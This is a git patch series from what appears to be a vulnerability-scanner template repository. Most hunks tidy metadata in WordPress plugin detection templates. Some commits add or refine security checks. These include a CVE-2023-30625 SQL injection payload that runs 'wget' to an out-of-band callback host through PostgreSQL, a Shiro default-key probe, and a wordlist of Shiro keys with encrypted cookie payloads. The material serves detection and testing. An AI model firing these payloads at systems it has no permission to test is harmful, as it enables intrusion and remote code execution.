--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-migrate-db/
   metadata:
-    max-request: 1
     plugin_namespace: wp-migrate-db
     wpscan: https://wpscan.com/plugin/wp-migrate-db
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index ee05e3add8..01fb12d0ad 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-multibyte-patch/
   metadata:
-    max-request: 1
     plugin_namespace: wp-multibyte-patch
     wpscan: https://wpscan.com/plugin/wp-multibyte-patch
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index df2487955f..1773857e15 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-optimize/
   metadata:
-    max-request: 1
     plugin_namespace: wp-optimize
     wpscan: https://wpscan.com/plugin/wp-optimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index 79ff01211c..bcd1509c68 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-pagenavi/
   metadata:
-    max-request: 1
     plugin_namespace: wp-pagenavi
     wpscan: https://wpscan.com/plugin/wp-pagenavi
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index 23414b3d1d..c6aca20a60 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reset/
   metadata:
-    max-request: 1
     plugin_namespace: wp-reset
     wpscan: https://wpscan.com/plugin/wp-reset
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
index fba45020e4..56dfdf4a59 100644
--- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
+++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reviews-plugin-for-google/
   metadata:
-    max-request: 1
     plugin_namespace: wp-reviews-plugin-for-google
     wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml
index 0178c8e9fb..810fc82cde 100644
--- a/http/technologies/wordpress/plugins/wp-rollback.yaml
+++ b/http/technologies/wordpress/plugins/wp-rollback.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-rollback/
   metadata:
-    max-request: 1
     plugin_namespace: wp-rollback
     wpscan: https://wpscan.com/plugin/wp-rollback
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml
index 017cf76f11..2276545093 100644
--- a/http/technologies/wordpress/plugins/wp-seopress.yaml
+++ b/http/technologies/wordpress/plugins/wp-seopress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-seopress/
   metadata:
-    max-request: 1
     plugin_namespace: wp-seopress
     wpscan: https://wpscan.com/plugin/wp-seopress
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index a04ddc6003..783d381ed8 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-sitemap-page/
   metadata:
-    max-request: 1
     plugin_namespace: wp-sitemap-page
     wpscan: https://wpscan.com/plugin/wp-sitemap-page
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index bc83478f06..27f6d46c2b 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-smushit/
   metadata:
-    max-request: 1
     plugin_namespace: wp-smushit
     wpscan: https://wpscan.com/plugin/wp-smushit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index dedd2e23b6..ab61cc0338 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-statistics/
   metadata:
-    max-request: 1
     plugin_namespace: wp-statistics
     wpscan: https://wpscan.com/plugin/wp-statistics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 03cd7137a8..5f6fbc1f75 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-super-cache/
   metadata:
-    max-request: 1
     plugin_namespace: wp-super-cache
     wpscan: https://wpscan.com/plugin/wp-super-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index a68d4b7d78..d67150d038 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-user-avatar/
   metadata:
-    max-request: 1
     plugin_namespace: wp-user-avatar
     wpscan: https://wpscan.com/plugin/wp-user-avatar
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index bf9dfc3ad8..beeba7ca69 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-recaptcha/
   metadata:
-    max-request: 1
     plugin_namespace: wpcf7-recaptcha
     wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index 47911a86a5..c225df7bfd 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-redirect/
   metadata:
-    max-request: 1
     plugin_namespace: wpcf7-redirect
     wpscan: https://wpscan.com/plugin/wpcf7-redirect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index 1c25b6f488..aaad04cb76 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpforms-lite/
   metadata:
-    max-request: 1
     plugin_namespace: wpforms-lite
     wpscan: https://wpscan.com/plugin/wpforms-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index b36317acd8..ff750a7d2a 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wps-hide-login/
   metadata:
-    max-request: 1
     plugin_namespace: wps-hide-login
     wpscan: https://wpscan.com/plugin/wps-hide-login
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index 5eb35dd17e..f1e7595ccd 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpvivid-backuprestore/
   metadata:
-    max-request: 1
     plugin_namespace: wpvivid-backuprestore
     wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index ceb2b8d600..4b2769ee46 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/yith-woocommerce-wishlist/
   metadata:
-    max-request: 1
     plugin_namespace: yith-woocommerce-wishlist
     wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
   tags: tech,wordpress,wp-plugin,top-100,top-200

From 463f722ad7c7699c6a3cbd10c71d1d26a41a5865 Mon Sep 17 00:00:00 2001
From: GwanYeong Kim 
Date: Sun, 1 Oct 2023 13:57:52 +0900
Subject: [PATCH 0506/1090] Create CVE-2023-30625.yaml

rudder-server is part of RudderStack, an open source Customer Data Platform (CDP). Versions of rudder-server prior to 1.3.0-rc.1 are vulnerable to SQL injection. This issue may lead to Remote Code Execution (RCE) due to the `rudder` role in PostgresSQL having superuser permissions by default. Version 1.3.0-rc.1 contains patches for this issue.

Signed-off-by: GwanYeong Kim 
---
 http/cves/2023/CVE-2023-30625.yaml | 37 ++++++++++++++++++++++++++++++
 1 file changed, 37 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-30625.yaml

diff --git a/http/cves/2023/CVE-2023-30625.yaml b/http/cves/2023/CVE-2023-30625.yaml
new file mode 100644
index 0000000000..89822fbaa0
--- /dev/null
+++ b/http/cves/2023/CVE-2023-30625.yaml
@@ -0,0 +1,37 @@
+id: CVE-2023-30625
+
+info:
+  name: Rudder Server - SQL Injection
+  author: gy741
+  severity: high
+  description: |
+    rudder-server is part of RudderStack, an open source Customer Data Platform (CDP). Versions of rudder-server prior to 1.3.0-rc.1 are vulnerable to SQL injection. This issue may lead to Remote Code Execution (RCE) due to the `rudder` role in PostgresSQL having superuser permissions by default. Version 1.3.0-rc.1 contains patches for this issue.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-30625
+    - https://securitylab.github.com/advisories/GHSL-2022-097_rudder-server/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2023-30625
+    cwe-id: CWE-89
+    epss-score: 0.010870000
+    epss-percentile: 0.826540000
+    cpe: cpe:2.3:a:rudderstack:rudder-server:*:*:*:*:*:*:*:*
+  tags: rudder-server,rudderstack,cve,cve2023
+
+variables:
+  cmd: "wget {{interactsh-url}}"
+
+requests:
+  - raw:
+      - |
+        POST /v1/warehouse/pending-events HTTP/1.1
+        Host: {{Hostname}}
+
+        {"source_id": "test'; copy (SELECT '') to program '{{cmd}}'-- - "}
+
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the DNS Interaction
+        words:
+          - "dns"

From 580da365f2e8a42a8726f68becf2e4ff4f7256b4 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran 
Date: Mon, 25 Sep 2023 08:07:20 +0530
Subject: [PATCH 0507/1090] Update blazor-webassembly-detect.yaml

---
 http/technologies/blazor-webassembly-detect.yaml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/http/technologies/blazor-webassembly-detect.yaml b/http/technologies/blazor-webassembly-detect.yaml
index e7e0be0810..195412e174 100644
--- a/http/technologies/blazor-webassembly-detect.yaml
+++ b/http/technologies/blazor-webassembly-detect.yaml
@@ -10,8 +10,9 @@ info:
     - https://dotnet.microsoft.com/en-us/apps/aspnet/web-apps/blazor
     - https://github.com/righettod/burp-piper-custom-scripts/issues/1
   metadata:
-    max-request: 2
+    max-request: 1
     verified: true
+    shodan-query: html:"blazor.boot.json"
   tags: blazor,webassembly,detect
 
 http:

From 476f2ea24dff46ae4f414e42698f36faef552d7d Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran 
Date: Mon, 25 Sep 2023 08:53:10 +0530
Subject: [PATCH 0508/1090] Create ojs-installer.yaml

---
 .../installer/ojs-installer.yaml              | 29 +++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 http/misconfiguration/installer/ojs-installer.yaml

diff --git a/http/misconfiguration/installer/ojs-installer.yaml b/http/misconfiguration/installer/ojs-installer.yaml
new file mode 100644
index 0000000000..ac1e65b86d
--- /dev/null
+++ b/http/misconfiguration/installer/ojs-installer.yaml
@@ -0,0 +1,29 @@
+id: ojs-installer
+
+info:
+  name: Open Journal Systems Installer - Exposure
+  author: DhiyaneshDK
+  severity: high
+  metadata:
+    max-request: 1
+    verified: true
+    shodan-query: http.favicon.hash:2099342476
+  tags: misconfig,ojs,install,exposure
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/index/install'
+      - '{{BaseURL}}/index.php/index/install'
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'OJS Installation'
+
+      - type: status
+        status:
+          - 200

From 9d0fa3af3285e909fbd7b03f6112f320b4dc3a90 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Mon, 25 Sep 2023 04:02:07 +0000
Subject: [PATCH 0509/1090] Auto WordPress Plugins Update [Mon Sep 25 04:02:07
 UTC 2023] :robot:

---
 helpers/wordpress/plugins/wp-reset.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/helpers/wordpress/plugins/wp-reset.txt b/helpers/wordpress/plugins/wp-reset.txt
index 89130f4674..9288825870 100644
--- a/helpers/wordpress/plugins/wp-reset.txt
+++ b/helpers/wordpress/plugins/wp-reset.txt
@@ -1 +1 @@
-1.97
\ No newline at end of file
+1.98
\ No newline at end of file

From 8e3d9c97ce604d0f2402c25ef4c4cdbfb73019d7 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Krzysztof=20Zaj=C4=85c?= 
Date: Mon, 25 Sep 2023 16:24:23 +0200
Subject: [PATCH 0510/1090] ZZZCMS RCE is a false positive if we see phpinfo()
 without posting any data

---
 http/cves/2019/CVE-2019-9041.yaml | 15 ++++++++++++++-
 1 file changed, 14 insertions(+), 1 deletion(-)

diff --git a/http/cves/2019/CVE-2019-9041.yaml b/http/cves/2019/CVE-2019-9041.yaml
index cef42a950c..9cfe4a4be4 100644
--- a/http/cves/2019/CVE-2019-9041.yaml
+++ b/http/cves/2019/CVE-2019-9041.yaml
@@ -23,6 +23,13 @@ info:
   tags: cve,cve2019,zzzcms,rce,edb
 
 http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/search/"
+
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+
   - method: POST
     path:
       - "{{BaseURL}}/search/"
@@ -36,7 +43,13 @@ http:
     matchers-condition: and
     matchers:
       - type: word
-        part: body
+        part: body_1
+        words:
+          - "phpinfo"
+        negative: true
+
+      - type: word
+        part: body_2
         words:
           - "phpinfo"
           - "PHP Version"

From f188fcbe2f804f8e01b6657667517bc307d0bdb6 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Krzysztof=20Zaj=C4=85c?= 
Date: Mon, 25 Sep 2023 16:28:43 +0200
Subject: [PATCH 0511/1090] more precise status code match

---
 http/cves/2019/CVE-2019-9041.yaml | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/http/cves/2019/CVE-2019-9041.yaml b/http/cves/2019/CVE-2019-9041.yaml
index 9cfe4a4be4..5e689dd94a 100644
--- a/http/cves/2019/CVE-2019-9041.yaml
+++ b/http/cves/2019/CVE-2019-9041.yaml
@@ -54,6 +54,6 @@ http:
           - "phpinfo"
           - "PHP Version"
 
-      - type: status
-        status:
-          - 200
+      - type: dsl
+        dsl:
+          - 'status_code_2 == 200'

From c02fc785e0d33f95d457ef12bee43fad8f939043 Mon Sep 17 00:00:00 2001
From: Prince Chaddha 
Date: Mon, 25 Sep 2023 23:17:08 +0530
Subject: [PATCH 0512/1090] Create shiro-deserialization-detection.yaml

---
 .../shiro-deserialization-detection.yaml      | 35 +++++++++++++++++++
 1 file changed, 35 insertions(+)
 create mode 100644 http/vulnerabilities/apache/shiro/shiro-deserialization-detection.yaml

diff --git a/http/vulnerabilities/apache/shiro/shiro-deserialization-detection.yaml b/http/vulnerabilities/apache/shiro/shiro-deserialization-detection.yaml
new file mode 100644
index 0000000000..99f9567fc2
--- /dev/null
+++ b/http/vulnerabilities/apache/shiro/shiro-deserialization-detection.yaml
@@ -0,0 +1,35 @@
+id: shiro-deserialization-detection
+
+info:
+  name: Shiro <= 1.2.4 Deserialization Detection
+  author: hotpot
+  severity: unknown
+  description: |
+    This template is designed to detect the Shiro framework's default key vulnerabilities. It leverages 51 built-in Shiro keys to probe for potential vulnerabilities.
+  reference:
+    - https://github.com/sv3nbeast/ShiroScan
+  tags: shiro,deserialization,rce,apache
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: JSESSIONID={{randstr}};rememberMe=123;
+
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: JSESSIONID={{randstr}};rememberMe={{key}};
+    
+    payloads:
+      key: helpers/wordlists/shiro_encrypted_keys.txt
+
+    req-condition: true
+    stop-at-first-match: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(header_1, "Set-Cookie") && (contains(header_1, "rememberMe=") || contains(header_1, "=deleteMe"))'
+          - '!contains(header_2, "rememberMe=") && !contains(header_2, "=deleteMe")'
+        condition: and

From fd719798d1ee294db24551ed271cdf850813713a Mon Sep 17 00:00:00 2001
From: Prince Chaddha 
Date: Mon, 25 Sep 2023 23:18:28 +0530
Subject: [PATCH 0513/1090] Create shiro_encrypted_keys.txt

---
 helpers/wordlists/shiro_encrypted_keys.txt | 51 ++++++++++++++++++++++
 1 file changed, 51 insertions(+)
 create mode 100644 helpers/wordlists/shiro_encrypted_keys.txt

diff --git a/helpers/wordlists/shiro_encrypted_keys.txt b/helpers/wordlists/shiro_encrypted_keys.txt
new file mode 100644
index 0000000000..8f7ad77630
--- /dev/null
+++ b/helpers/wordlists/shiro_encrypted_keys.txt
@@ -0,0 +1,51 @@
+kPH+bIxk5D2deZiIxcaaaA==:f0USSIbi3sbw8Bgn3R/19oDCc/XdB7W17+Fnq0sRSzZYB/WANIHzP6jKXcPkiy3FcZVGY86gSBXj1p9Nlv6b/+X0xf5fvpjtVsM86sZ1KEhjf+iBB2gRYuUoK2a2xGYjSLxYhgVfvPfARwMAT3iEykc67BcfzKSyWa9LlSBE85vv0qdFwIfA/uwCe5r2LF1GFuUSnJjqjNlPTH+yq1xTDo3Ua/mWzCLJ3W5JeJmV0+IV6dfVQ4wq6DHLrptq80JIU5N5YBmdKThNzCFT3Nc7P9gOreQ6VF+GIlAJdt04FhA1m3tDD/vXYTvkF1GQNKbnu9n+daiDNd+DVGyB8+IT8LngRhBbShI3M0hIt75vCU86GXS9L2VLRi2qU2eUmtU2LEZ+iE/yOx99dNettXKi1UZA4x/Nf4018+9pwhJ1QqZP3UhrFgiiPDYh6/ouYviz5Erua12aH4GP2jFJvPwIdEabFpH9WMiSkUKh5M2xtsHPHxZCN7eu5BNQ2US18LooMhVCEZHjZwJFYH229za5cmnKj0kgPcx6bhNsVdDPdtU=
+a2VlcE9uR29pbmdBbmRGaQ==:Lymw7k38V0zgxSNE5jvOb8dugluAK6AEV+nTTDHhI3LP4O/HQLqCYwaPlM5URAVjVOqje36G53KsUGmVRLTkdffxq1Skk8x5SU/3RTQtEYvZSpcTFBmFVmnsN2tZnxtRVV6INEnz4NO3Lf6eD/aNO8fepJIAEVn23M0Y8ZxOU6H7jFech7QYQUUS5iI45xJs2OwjW1344YQVh/d4IRN0hAJoU8lx+d7gtTqIawvQ8BJ7Q5mH+l2VMP6HWzsqZhNVd6iyFTwWV2ty7ZSZA2OCClTfvPWi9DZSPOczx/WxjHNWJ7A9UT3QKvdfYM3u9uQE5z4us4aeX7BmmqHcRmJiPVezg/NqwG3sIy5DHGS6Ype12IJn6M9e4PwVsAY4fbScMUtxtIwLbSKFaUaYcx6WkXbD2w7kqFxdIeb8vaomw8UF8Riv0RCnZTBKFwpqQ6vobbaO5y2VZwVfiU4CXfunotEyP4dUVLBCzMfu7W8O/ioDgV5NvdkylnRCWiwsFpsjhHWpWRmknCMiAStWQj2Co+t5GXVvgOr3xQ/gxpYjkAY=
+3AvVhmFLUs0KTA3Kprsdag==:kw6Np9KkcpH3/JRL8wpNWB3gssOZa+tpIAiuZEmDPhmSra6Hui73fJhe3gLvo1BqTN16oaxwRbOGidAk5k9aJaqQCBGc9GLrLPI5ShlbZUt22pLjLCH1RUM68/hQTsRdqvRGWIjB1gFYFOHJVF2sCZdJ66qBQDyC/tAuXr8QQLCRjpYbc7U5Ojxmq8UFLVMZUA9jFfIrPvRqaVdak+T81ZpRZ/7KM8Da9TqhDNvQ6p+iDP3mMuk0SW04A3hfxb2n6P9DG7eoRfL4sak/07nW+r0ElA4F9Q69qBfYhlaWkyTviWSuA3S4CKrnkyus6LhkBAmNJ8g4ezoUHQ7rBqurVroWbX4gEBHcvVAafUKWGsU6PR+alySNZ1ocvdK2xy/QndK/OwJdFgwSGvEBj2tRhdyLydOaGFUlilWNU3tmfDm6qPdLO23oLb4yQhW2StqPVvQjBo6Id9Llh5X9JRJRWgu14G5F/0IMnpY5gnqJt5ddF6CSjWpUZkSdBgNtRoZ8IUnWEAtVj6WCuhDtXyy+PN4kp9INJXHvg5ZotswIXSE=
+bWljcm9zAAAAAAAAAAAAAA==:O+oNEf+CnPnwusgkAnp5bXUVlhG+MdZeYRGsH26+YDO3kIEbATE/TeYT8hjBEE67ugQ7SFQXn3FKjcHsejZYhd/IV0TzbdVoUu26ZgIJM4wT5EvM3nCW4PtUbzuTNd0rsk9Dr5jrRv8n7Xmcfi0V396quwQWUbDVgBRdwg9/giDNb39VcKV1KD0/JF6ZMJgmduHrL9h25ZUsf2gH4rREwwhNMcWVhSTT4eb+RFioQf8fE6xoFNqQyee53W0Nv3MYROu4+1f+fisgBMq9U7SYWW7UysrLDClEBgObcYWhfxcTcvjcIJZl+UpUI0NL/kbFv4Z7rZ7nwshW8ul/cH1An5qszZrY6zmpUkNTb9FaHboXv+SBrdcdF0dEuOwHA0IT6cZ5kAYqmHRewH4WitRr+SBy9GHdb4IyQD3TLW6daVT/QNys2HliwlBMZLEkoo60EmjA47lnPNI4d/BY5rZEqHpdIBplQwVAEqC69NyLgQ0AfPtuwLkVpMA+f3dJNi5DMYO4lelI6gXEB31REjYQgQV/ixjselOf+VmpJSfcPAQ=
+U3ByaW5nQmxhZGUAAAAAAA==:Q3gdz7MW638P5LW/DYZYtnyc8QdezeulZBCkhUS2xu4Ap0QYR7qnrpmcfjcWAjkkTsqpEKlrRYc7i0lfhLFo7m+yFfuZNdPX/7SFpvi0nwW4hVruD+/vLWwjNkV/SmaTjHXdtovYWh7lMxhO8owOyUO2u4ZOjNlCg/jCSmU8ccAnOAtwz3VLdb0pVPQ2CzE9K2uJHcaLN/W1P7eENRsy8xeZx8LKlU1rjM6B/YEtWX6BUce4H2T8+O3MdV1ZPMyj6TAWZ3VKvbuhxXWtUh9lEC9pzV64VnJO27hJ+Ph40xYR+mof+SXleP64dRtfcOYlORpjFP1MWLT4CbH44oiaHUlvJSBho55JZM528Yq1CBs4azHate+V1gOKW0XFimT8CC2mvhXEuJ09vvPJbPPcbYE7jcIQnqbc+ZcalxxrNAWtbnMpYYh/AzyZ4kSdvYJg+dJp6/fy9+TI2cxygLmCcreYSDESuU2i9FGbDCCoD2VtMUx7etmBHyW+3G0Rlzd6Q0dAlHJ45/69rqgMk0Fnyopo45cVE8HAFPXFOzae1Xk=
+fCq+/xW488hMTCD+cmJ3aQ==:GtPDQzm/bMq9HmIMjaMAA4R9CTRvWs8jZ90QNmLNrSnaUQXgZaW3nLSatwUyr3YYkGKJTmV4KGjyZzhbVAm9l+Xgid4P3uKBz58TjRuOcASodX/pKCdiRLU6dA+02VVOXtdIhHB7HP+9DlKVsBIOZ3y7h/XW9qFmW1J7nogYN3YzcaR7oOCARvRM/DcFriAUrwaoJrmvtFPf4QtNsktGx8ZFYYd/tn6xWNvZDh35CNJjGER9Ckgy1RUTTjktZoeb/d1SNIxK0IKizgTLPFYjVcBFNqX7o3qMTt6mEIu0zWEocpmvR9RqBsnyD/eYeL+k4ve9vYIO6dPmTIC00N5tqH5oY4Nq9EectMqz/7Orbw4CClnaxtZvE/AOHFc8m0yMfgqzt/E4OJ3IUb/0OljoAZ7BdMg3OHmPXkTV6dkF6nGOqi8Jv261t209ztiZelNlQIFT/K4UKWRHcGkhj/eN2B6pIgPyRSNv/iEf2PVA8iaiPRKkVcUjfHuhIPeCd1r5HyiFIppSgyohlEWcNOXitaPzI7WDXz9EYWDeU1vAJoY=
+ZUdsaGJuSmxibVI2ZHc9PQ==:o2B4t6KZhw/v1aEZ2AhCRMCd/45dcXY2WGM9V6pVG6rJzNxPgJcmRmt8o5ZCNua/nZFNNJXncZD6TsugO2e/UZBFPhZrGBLcxw9Pn+SQKgadmeMCk0ERI87jjvidGcLFd00Zoc4OxGcm56lH7hduxd5fwQVOmjciSo0RWJTgOLKJkYJKmYEomp+AkfTjRxqRUwC1xJNfi7EE3b05tERRaWNqz29WWkByyXccDrPTOxLslno332GPXjdTWXdOIvnckNBg02Caw9J70/GjODUE8iPYFQKoYwP5bc/Tz8m2OmttouErkCDODsRYaaUiAAAh9tpSGRDunkyllIEQhYdA4LcrDj+B36kkkBF9kT9ws1LikKGxdxpQqeFJ1qF3uNUjVIww8vkVBl3PIKOwfLwXYL9GIw5uxYKCdDMtXbaFhVexwuuC64VF/S+cCqw+wR3JaQPRXZwzvn+IZs9/GsyxLU4X18aQJ/9gDEouwv/mEGkPyrCB89MH4rFNKy90bHlGcRv6KNcJe6PkDtmDSkk6dRmCeLJz7HYy/MLwB8X3VOM=
+MTIzNDU2Nzg5MGFiY2RlZg==:0UQYaokZAOt4Yq1/FrbAG2otUpdxh51vYsLPYfbPbomJbelOlEWuNp9Pt35wEYeVmKDy2DCTORXtXyNocWqQZDQUKKtOzF41yOt9nEy5gcmVHA+PfWv6tpGwKH5ukTo1HKLPA4bEhhGXGTfg5D+pvgtRqa0v1qsgjaRPMyuReQTuvbNGi8LhXnOZygJfL6iXx05PIN91UtW1sqc8nL4toL5UbuPkAXDyiy5WnMMz6y5o0+dRK1SS6HlFhnJmAdewL9cbRlA+bRxt9JHzxYSSbrXwK9yaQNPJ+wf7wqeUINm3k/QWLGEiu7DCzMgRsMTNcWW1FRX343J8Ae5iaEK6OTKppqw4t8u8pTB+DaRhrenCxgtj4yVbauo020YNV3UC1091/eTLrm8FRmM312RdB98iCi14FfwyouKsKr7dCyBOScMkWx+JLXRjxx2lvoSpXctXhgSW2+zu8j/+zMP2frU85kPzysmp5EiQmoOiAmQxkO/ecjGrkM8LM7KpqAIJRyWu6T2s3yc1oCHf7nhcQTiFlh8iLpTYtydhZ9wBFek=
